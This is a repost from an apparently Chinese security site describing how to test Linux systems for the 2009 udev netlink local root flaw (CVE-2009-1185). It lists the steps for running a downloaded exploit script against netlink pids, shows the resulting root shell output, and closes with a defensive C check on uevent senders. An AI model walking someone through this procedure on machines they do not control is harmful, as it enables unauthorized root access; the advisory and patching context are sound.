myhack58 | Anonymous | MYHACK58:62200924189
Aug 06, 2009 - 12:00 a.m.

Linux udev privilege escalation vulnerability: testing method

Source: www.myhack58.com

CVSS2: 7.2 High (AV:L/AC:L/Au:N/C:C/I:C/A:C)
Access Vector: LOCAL
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
EPSS: 0.0005 Low (percentile 13.2%)

Author: Liang increased sea
Article source: http://s-logs.com/2009/04/linux-udev.html
Copyright: may be freely reproduced. When reprinting, please be sure to credit the article's origin and author with a hyperlink and include this statement.
Information about the vulnerability is available at the following links:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
http://www.linux-magazine.com/online/news/local_root_exploit_in_udev
http://www.debian.org/security/2009/dsa-1772
http://milw0rm.com/exploits/8478

Test method:

Download the following script file:

exploit.sh

Place it in a directory for later use.

cat /proc/net/netlink

This returns output like the following:

user@debian:~/attack$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f79e8200 0   2784   00000111 0        0        00000000 2
f7a10200 0   2771   00000001 0        0        00000000 2
dfb4ca00 0   0      00000000 0        0        00000000 2
dff58400 7   0      00000000 0        0        00000000 2
dff7a800 9   0      00000000 0        0        00000000 2
dff71e00 10  0      00000000 0        0        00000000 2
f75dd200 15  1175   00000001 0        0        00000000 2
dfb4c800 15  0      00000000 0        0        00000000 2
dffb6a00 16  0      00000000 0        0        00000000 2

In the directory containing the downloaded sh file, execute:

sh exploit.sh 2784

The number at the end is the netlink pid. As the output above shows, there can be several of them, so multiple attempts may be needed: 2784, 2771 and 1175 can each be tried.

The script generates C files, calls GCC to compile them, and then executes the result. If the host does not have GCC, you can modify the code to use another compiler, or compile locally and upload the binary.

I succeeded when trying 1175. When you see a shell prompt ending in #, you know what that means.

user@debian:~/attack$ sh exploit.txt 1175
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.2# id
uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),106(netdev),109(powerdev),1000(user)

Readers, please do not use this for illegal purposes; use it only to test whether your own system has this vulnerability. If it does, upgrade the udev package promptly, or upgrade the entire system.
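
The CVE entry linked above describes CVE-2009-1185 as udev not verifying that a netlink message originates from kernel space. The following added example (not code from this article or from udev) sketches that receiver-side check; uevent_from_kernel, demo_check, peer_cred and CRED_CMSG_TYPE are hypothetical names, and the demo input is constructed.

```c
#include <stdbool.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/netlink.h>

/* Declared locally so the block builds without _GNU_SOURCE: the Linux value
 * of SCM_CREDENTIALS and a struct with the layout of struct ucred. */
#define CRED_CMSG_TYPE 0x02
struct peer_cred { pid_t pid; uid_t uid; gid_t gid; };

/* True only if a message filled in by recvmsg() on a NETLINK_KOBJECT_UEVENT
 * socket (SO_PASSCRED enabled) can be attributed to the kernel. */
bool uevent_from_kernel(struct msghdr *msg)
{
    const struct sockaddr_nl *snl = msg->msg_name;
    struct peer_cred cred;

    if (!snl || msg->msg_namelen < sizeof(*snl) || snl->nl_family != AF_NETLINK)
        return false;
    if (snl->nl_pid != 0)                  /* the kernel's port id is 0 */
        return false;
    for (struct cmsghdr *c = CMSG_FIRSTHDR(msg); c; c = CMSG_NXTHDR(msg, c)) {
        if (c->cmsg_level != SOL_SOCKET || c->cmsg_type != CRED_CMSG_TYPE ||
            c->cmsg_len < CMSG_LEN(sizeof(cred)))
            continue;
        memcpy(&cred, CMSG_DATA(c), sizeof(cred));
        return cred.uid == 0;              /* reject unprivileged senders */
    }
    return false;                          /* no credentials: cannot verify */
}

/* Constructed input: the msghdr recvmsg() would fill in for a sender with the
 * given port id and uid (hypothetical helper, used only to exercise the check). */
bool demo_check(unsigned int port, uid_t uid, bool with_cred)
{
    struct sockaddr_nl snl = { .nl_family = AF_NETLINK, .nl_pid = port };
    struct peer_cred cred = { .pid = (pid_t)port, .uid = uid, .gid = uid };
    union { struct cmsghdr align; char buf[CMSG_SPACE(sizeof(cred))]; } ctl;
    struct cmsghdr *c = (struct cmsghdr *)ctl.buf;
    struct msghdr msg = { .msg_name = &snl, .msg_namelen = sizeof(snl),
        .msg_control = ctl.buf, .msg_controllen = with_cred ? sizeof(ctl.buf) : 0 };

    memset(&ctl, 0, sizeof(ctl));
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = CRED_CMSG_TYPE;
    c->cmsg_len = CMSG_LEN(sizeof(cred));
    memcpy(CMSG_DATA(c), &cred, sizeof(cred));
    return uevent_from_kernel(&msg);
}
```

A receiver applying this check drops a datagram whose sender has a non-zero netlink port id or a non-root uid, and also drops one that arrives without credentials.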
